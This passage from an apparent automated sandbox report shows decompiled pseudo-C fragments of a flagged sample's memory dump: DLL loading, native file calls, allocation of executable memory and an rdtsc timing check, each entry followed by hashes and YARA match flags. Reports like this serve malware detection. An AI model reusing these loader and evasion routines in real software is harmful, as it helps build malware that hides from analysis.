                                      • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp Download File
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 2bf6b7dfb157ee7dc7960802a5cf0a7aaef95fec8a6af33fad5df72461be129e
                                      • Instruction ID: 4fe294f8d6695b451609cdeff54228d58b425004672646ae7e0e561440784175
                                      • Opcode Fuzzy Hash: 2bf6b7dfb157ee7dc7960802a5cf0a7aaef95fec8a6af33fad5df72461be129e
                                      • Instruction Fuzzy Hash: BF0148B6200104AFDB04DF98DD85DEB77AEEF8C714F144249F90D97240CA30E841CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00409B40, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00409B40(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AF70( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B390(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B610( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419720(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                      0x00409b5c
                                      0x00409b5f
                                      0x00409b64
                                      0x00409b69
                                      0x00409b73
                                      0x00409b78
                                      0x00409b7b
                                      0x00409b7d
                                      0x00409b85
                                      0x00409b8a
                                      0x00409b8a
                                      0x00409b91
                                      0x00409b99
                                      0x00409b9c
                                      0x00409b9e
                                      0x00409bb2
                                      0x00000000
                                      0x00409bb4
                                      0x00409bba
                                      0x00409b6e
                                      0x00409b6e
                                      0x00409b6e

                                      APIs
                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp Download File
                                      Yara matches
                                      Similarity
                                      • API ID: Load
                                      • String ID:
                                      • API String ID: 2234796835-0
                                      • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                      • Instruction ID: 0a0fff248a1c50f77d94468520b7725d30d267451342bd90074e2a3d68e37629
                                      • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                      • Instruction Fuzzy Hash: B50152B5D0010DB7DF10DAE1EC42FDEB378AB54318F0041A6E908A7281F634EB54C795
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004185DA, Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp Download File
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 2c403a48bae9b9af3bb882557e77a3b7565afaf06a03815e8e4050d5364ac463
                                      • Instruction ID: 1dc3906f95748dfc2a0cae637e35c376a31853676daa44fa695532940dffa423
                                      • Opcode Fuzzy Hash: 2c403a48bae9b9af3bb882557e77a3b7565afaf06a03815e8e4050d5364ac463
                                      • Instruction Fuzzy Hash: C301B6B6215209AFCB48CF88DC95DEB77A9AF8C354F158248FA1D97240C630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004185E0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp Download File
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                      • Instruction ID: 36c6eae92b8005ba539885d914b12f5379157c135ee825ad128bd076db7cd32f
                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                      • Instruction Fuzzy Hash: 24F0B2B2204208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004187C0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E004187C0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191E0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                      0x004187cf
                                      0x004187d7
                                      0x004187f9
                                      0x004187fd

                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp Download File
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                      • Instruction ID: 15e9253bdc6667238a85ff9da65bd6f3d3aad2e55959b4b07e7d113ae3ba9bea
                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                      • Instruction Fuzzy Hash: 6CF015B2200209ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F910CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00418710, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00418710(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409763
				E004191E0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                      0x00418713
                                      0x00418716
                                      0x0041871f
                                      0x00418727
                                      0x00418735
                                      0x00418739

                                      APIs
                                      • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp Download File
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                      • Instruction ID: bce2094732f0dc6043ed148681cd5d29f2b757d64a263796670ac5fc8daf7d12
                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                      • Instruction Fuzzy Hash: 27D01776200214BBE710EB99CC89EE77BACEF48760F154499FA189B242C930FA40C6E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041870B, Relevance: 1.5, APIs: 1, Instructions: 19nativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 68%
                                      			E0041870B(intOrPtr _a8, void* _a12) {
				long _t8;
				void* _t12;

				asm("stosb");
				asm("adc eax, 0x8bec8b55");
				_t5 = _a8;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409763
				E004191E0(_t12, _a8, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a12); // executed
				return _t8;
			}





                                      0x0041870c
                                      0x0041870d
                                      0x00418713
                                      0x00418716
                                      0x0041871f
                                      0x00418727
                                      0x00418735
                                      0x00418739

                                      APIs
                                      • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp Download File
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: 66e86973879c9bb60a53896baf6160e9d86140dbd917c851256820a544cae62c
                                      • Instruction ID: ccf6313a826aaa7f6eb6fa578ddab1b3769b18e28e355f72b51d457b8fecacc7
                                      • Opcode Fuzzy Hash: 66e86973879c9bb60a53896baf6160e9d86140dbd917c851256820a544cae62c
                                      • Instruction Fuzzy Hash: 21D02EAD40D2C01BDB11EAB8A8D20C27F80EE802183280A8FE8A807203C528E20A9290
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AB98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 55af104e65493959a3b045fc209df0a4fc67bea0fd4d261e75c82f7522778e97
                                      • Instruction ID: ca347d956d130fc28e9bf3ecbfcfc175f6ca726f6af44adc79914e3c3c1641a5
                                      • Opcode Fuzzy Hash: 55af104e65493959a3b045fc209df0a4fc67bea0fd4d261e75c82f7522778e97
                                      • Instruction Fuzzy Hash: 3290026160500502D30171694404B16000A97D0381F92C036A1114595ECA658992F171
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AB9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 7eabb48c259bb7b693792b69cfcdbbaf4cc8ebc98c062eef8b1e13ddbf4ad1df
                                      • Instruction ID: 47e3c99fb5e71eb188e40da21ff5119dcd9d9a48cd65bc5c51f461d00f38e03c
                                      • Opcode Fuzzy Hash: 7eabb48c259bb7b693792b69cfcdbbaf4cc8ebc98c062eef8b1e13ddbf4ad1df
                                      • Instruction Fuzzy Hash: 9B90027120500413D31161694504B07000997D0381F92C436A0514598D96968952F161
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AB9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 1df5af19f398aa5e1449371e36dfa91e6ac0e31a47086ca7718e99c651ee7b47
                                      • Instruction ID: 3d3d17baa0602041cc143a76009b3f3fa99b49e95e50b47cc2ee624adef075e7
                                      • Opcode Fuzzy Hash: 1df5af19f398aa5e1449371e36dfa91e6ac0e31a47086ca7718e99c651ee7b47
                                      • Instruction Fuzzy Hash: 10900261246041525745B1694404A074006A7E0381792C036A1504990C85669856E661
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AB99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 5f02b987e84a2bf44f29fb82309372205d625bac10cc0758a179ea3cefaa8914
                                      • Instruction ID: c026f655fec7fa114ab613049bd28a9a4c0a60f4a22d9b6420e8ea7a610899b8
                                      • Opcode Fuzzy Hash: 5f02b987e84a2bf44f29fb82309372205d625bac10cc0758a179ea3cefaa8914
                                      • Instruction Fuzzy Hash: 3C9002A134500442D30061694414F060005D7E1341F52C039E1154594D8659CC52B166
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AB9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: d177ac9f029d5cbe6d9ab378e25ccc84729e077cda3ce39aca23f9526e6c152b
                                      • Instruction ID: 51b2ab36ccd8a3418056d602dac2de474d8b3dd97001d7f37f8fc799697b06e9
                                      • Opcode Fuzzy Hash: d177ac9f029d5cbe6d9ab378e25ccc84729e077cda3ce39aca23f9526e6c152b
                                      • Instruction Fuzzy Hash: 139002B120500402D34071694404B46000597D0341F52C035A5154594E86998DD5B6A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AB9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 6ef5b5a9c25c2270d0afa3a0f40a788ca74ae82ef3af4d381feba62222488011
                                      • Instruction ID: 01bdc4a1eab63954c2403bd72f59dccc8c5e2dd31fc2bd06c26da9b2c7d2dd71
                                      • Opcode Fuzzy Hash: 6ef5b5a9c25c2270d0afa3a0f40a788ca74ae82ef3af4d381feba62222488011
                                      • Instruction Fuzzy Hash: 1A90026160500042434071798844E064005BBE1351752C135A0A88590D85998865A6A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AB9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 424a4366bc60731b194a54b1a0206c8e6790e0376b178187627ebd0c0579b9b7
                                      • Instruction ID: fbad0c2c4dcec2923ebb553f7525d3212f8f99b3f91adfd1834d07fcbcd40fbf
                                      • Opcode Fuzzy Hash: 424a4366bc60731b194a54b1a0206c8e6790e0376b178187627ebd0c0579b9b7
                                      • Instruction Fuzzy Hash: AB90027120540402D30061694814B0B000597D0342F52C035A1254595D86658851B5B1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AB9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 69251470b054167587144225613d435ddac39fb37cedd54a47e8a637dfcb2ca8
                                      • Instruction ID: ae7da978a7e5cde2a2f0c6cb20f3141907a17bba57da171a0684a8b24ad60794
                                      • Opcode Fuzzy Hash: 69251470b054167587144225613d435ddac39fb37cedd54a47e8a637dfcb2ca8
                                      • Instruction Fuzzy Hash: D790026121580042D30065794C14F07000597D0343F52C139A0244594CC9558861A561
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AB95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 797798abf11402d3515bbf2e2054553b757dc12ab012c32876eb4273776634f0
                                      • Instruction ID: 6381622d47ce0e66eb2de472c1f860bcdd3cab034cd1b972542807a7c8a8d7b0
                                      • Opcode Fuzzy Hash: 797798abf11402d3515bbf2e2054553b757dc12ab012c32876eb4273776634f0
                                      • Instruction Fuzzy Hash: F39002A120600003430571694414B16400A97E0341B52C035E11045D0DC5658891B165
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AB9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 2c685e1bf2ffcbef8aeaf0caa9d5810a29604edb2db45c430f1a2c5df5253f61
                                      • Instruction ID: b8fd0063769497a3c4a5a0bd6fe35cb974202eb275c34afae74f1d5b9240f4ad
                                      • Opcode Fuzzy Hash: 2c685e1bf2ffcbef8aeaf0caa9d5810a29604edb2db45c430f1a2c5df5253f61
                                      • Instruction Fuzzy Hash: 37900265215000030305A5690704A07004697D5391352C035F1105590CD6618861A161
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AB96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 517d64f09a84495556f18a2c36617c4eebc6565cc665ab382a9f3fe36f1f8912
                                      • Instruction ID: 1be88d5a2eb8e1157703dafa4542dbe18b3bff5bb0e0eea057e283ca6be5da01
                                      • Opcode Fuzzy Hash: 517d64f09a84495556f18a2c36617c4eebc6565cc665ab382a9f3fe36f1f8912
                                      • Instruction Fuzzy Hash: 9A90027120508802D31061698404B4A000597D0341F56C435A4514698D86D58891B161
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AB9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: e2ad52f04dcbd3adec45e5557663e323cdc2a281221a9cebe1a983fd8a6a78e4
                                      • Instruction ID: 2100620bea3a32f8e19b9d102ffd03e8059d5de84ad96fdeb43e22a3d7cdc196
                                      • Opcode Fuzzy Hash: e2ad52f04dcbd3adec45e5557663e323cdc2a281221a9cebe1a983fd8a6a78e4
                                      • Instruction Fuzzy Hash: 1B90027120500802D38071694404B4A000597D1341F92C039A0115694DCA558A59B7E1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AB97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 3a9afe3398ff3f7ae5f3414cc529eb05932eeebb581f26b5e19c55083342f285
                                      • Instruction ID: 1ceede0a7cb670c4d60282d1e800704b6b0748993a5cb60170de2753694ab54e
                                      • Opcode Fuzzy Hash: 3a9afe3398ff3f7ae5f3414cc529eb05932eeebb581f26b5e19c55083342f285
                                      • Instruction Fuzzy Hash: DC90026130500003D34071695418B064005E7E1341F52D035E0504594CD9558856A262
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AB9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 685c5ce58910f45f5f8e916c1c367af7efa0d2c4020190b4dcefcb5254ece0fa
                                      • Instruction ID: 6ab0d2ee7abec32692453d5130e9f00ba43068ef8c65de180ea78c516198fc8e
                                      • Opcode Fuzzy Hash: 685c5ce58910f45f5f8e916c1c367af7efa0d2c4020190b4dcefcb5254ece0fa
                                      • Instruction Fuzzy Hash: 8290026921700002D38071695408B0A000597D1342F92D439A0105598CC9558869A361
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AB9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 9fc8663e18b459676708d7c861d57229102882c7bc1d90b4b1587300a555a7b2
                                      • Instruction ID: 13b9e750c891e9de3df035afe71697c3ad864ce51e480c7cae803506e194450d
                                      • Opcode Fuzzy Hash: 9fc8663e18b459676708d7c861d57229102882c7bc1d90b4b1587300a555a7b2
                                      • Instruction Fuzzy Hash: 7490027131514402D31061698404B06000597D1341F52C435A0914598D86D58891B162
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AB9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 0cc879964c8d0a8f2b28df8f6bd27908440274e00633c100f94010c983c626a4
                                      • Instruction ID: 4fc44ef761ff19529dbd619fe24a43887543a74015ed4c8e16905f9e288fe321
                                      • Opcode Fuzzy Hash: 0cc879964c8d0a8f2b28df8f6bd27908440274e00633c100f94010c983c626a4
                                      • Instruction Fuzzy Hash: 6990027120500402D30065A95408B46000597E0341F52D035A5114595EC6A58891B171
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004088D0, Relevance: .1, Instructions: 92COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 93%
                                      			E004088D0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E20(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407030( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041A0F0( &_v284, 0x104);
						E0041A760( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DF0(E00413D90(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407060( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070E0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                      0x004088db
                                      0x004088e3
                                      0x004088e5
                                      0x004088ea
                                      0x004088ef
                                      0x00408902
                                      0x00408907
                                      0x00408910
                                      0x0040891c
                                      0x0040892f
                                      0x00408934
                                      0x00408937
                                      0x00408940
                                      0x00408952
                                      0x00408957
                                      0x0040895c
                                      0x00000000
                                      0x00000000
                                      0x0040895e
                                      0x00408962
                                      0x00000000
                                      0x00000000
                                      0x00408964
                                      0x00000000
                                      0x00408962
                                      0x00408966
                                      0x00408969
                                      0x0040896f
                                      0x00408971
                                      0x0040897c
                                      0x00408981
                                      0x00408984
                                      0x00408991
                                      0x0040899c
                                      0x0040899e
                                      0x004089a4
                                      0x004089a8
                                      0x004089ab
                                      0x004089ab
                                      0x004089b2
                                      0x004089b5
                                      0x004089ba
                                      0x004089c7
                                      0x004088f6
                                      0x004088f6
                                      0x004088f6

                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp Download File
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                      • Instruction ID: a66f789b9c9346c4209e30225a072a2b07741faaa143dbde407d40e20ce1c0b9
                                      • Opcode Fuzzy Hash: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                      • Instruction Fuzzy Hash: BD21FBB2C4420957CB15E6649E42BFF737C9B54304F04057FE989A3181F639AB4987A7
                                      Uniqueness

